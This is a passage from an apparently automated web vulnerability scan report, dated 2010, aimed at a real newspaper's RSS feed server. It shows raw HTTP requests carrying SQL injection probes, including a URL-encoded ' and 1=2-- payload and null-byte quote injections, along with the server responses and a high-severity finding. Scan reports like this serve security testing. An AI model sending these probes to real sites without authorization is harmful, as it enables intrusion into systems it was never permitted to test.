<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<HTML><HEAD><TITLE>The page cannot be found</TITLE>
<META HTTP-EQUIV="Content-Type" Content="text/html; charset=Windows-1252">
<STYLE type="text/css">
BODY { font: 8pt/12pt verdana }
H1 { font: 13pt/15pt verdana }
H2 { font: 8pt/12pt verdana }
A:link { color: red }
A:visited { color: maroon }
</STYLE>
</HEAD><BODY><TABLE width=500 border=0 cellspacing=10><TR><TD>

<h1>The page cannot be found</h1>
The page you are looking for might have been removed, had its name changed, or is temporarily unavailable.
<hr>
<p>Please try the following:</p>
<ul>
<li>Make sure that the Web site address displayed in the address bar of your browser is spelled and formatted correctly.</li>
<li>If you reached this page by clicking a link, contact
the Web site administrator to alert them that the link is incorrectly formatted.
</li>
<li>Click the <a href="javascript:history.back(1)">Back</a> button to try another link.</li>
</ul>
<h2>HTTP Error 404 - File or directory not found.<br>Internet Information Services (IIS)</h2>
<hr>
<p>Technical Information (for support personnel)</p>
<ul>
<li>Go to <a href="http://go.microsoft.com/fwlink/?linkid=8180">Microsoft Product Support Services</a> and perform a title search for the words <b>HTTP</b> and <b>404</b>.</li>
<li>Open <b>IIS Help</b>, which is accessible in IIS Manager (inetmgr),
and search for topics titled <b>Web Site Setup</b>, <b>Common Administrative Tasks</b>, and <b>About Custom Error Messages</b>.</li>
</ul>

</TD></TR></TABLE></BODY></HTML>

Request 2

GET /mngi/rss/CustomRssServlet/568'%20and%201%3d2--%20/214511.xml HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

1.104. http://feeds.mercurynews.com/mngi/rss/CustomRssServlet/568/214511.xml [REST URL parameter 5] previous

Summary

Severity:	High
Confidence:	Tentative
Host:	http://feeds.mercurynews.com
Path:	/mngi/rss/CustomRssServlet/568/214511.xml

Issue detail

Remediation detail

Request 1

GET /mngi/rss/CustomRssServlet/568/214511.xml%00' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 1

HTTP/1.1 400 Bad Request
Content-Type: text/html
Content-Length: 34
Expires: Tue, 07 Dec 2010 23:22:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:22:52 GMT
Connection: close

<h1>Bad Request (Invalid URL)</h1>

Request 2

GET /mngi/rss/CustomRssServlet/568/214511.xml%00'' HTTP/1.1
Host: feeds.mercurynews.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response 2

HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
X-ATG-Version: ATGPlatform/7.1 [ DASLicense/0 DPSLicense/0 DSSLicense/0 PortalLicense/0 ]
Content-Type: text/xml;charset=utf-8
Expires: Tue, 07 Dec 2010 23:22:52 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 07 Dec 2010 23:22:52 GMT
Content-Length: 591
Connection: close
Set-Cookie: JSESSIONID=YLI2POOCBMFEWCUUBC5CFGQ; path=/

<?xml version="1.0" encoding="UTF-8"?>
<rss xmlns:dc="http://purl.org/dc/elements/1.1/"
xmlns:atom="http://www.w3.org/2005/Atom"
version="2.0">
<channel>
<atom:link href="http://fee
...[SNIP]...

Report generated by XSS.CX at Tue Dec 07 18:18:35 CST 2010.